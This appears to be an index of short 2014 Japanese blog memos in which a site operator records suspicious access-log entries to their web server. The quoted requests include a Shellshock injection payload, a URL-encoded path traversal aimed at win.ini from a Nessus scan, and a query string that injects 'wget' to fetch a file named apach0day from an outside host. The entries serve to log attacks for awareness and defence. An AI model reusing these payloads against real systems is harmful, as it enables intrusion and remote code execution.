Shellshock

2014/09/29 17:43    メモ

scan履歴 internetsurvey-3.erratasec.com - - [25/Sep/2014:04:33:35 +0900] "GET / HTTP/1.0" 200 156 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2 …



Nessusの脆弱性スキャン

2014/09/18 14:55    メモ

リクエスト例 GET %. HTTP/1.1 GET %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1 GET . HTTP/1.0 GET ../.. …







変なアクセス

2014/08/19 14:23    メモ

Apache /icons/apache_pb.gif /webdav/ "\x80w\x01\x03\x01" (methodなし) /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSS …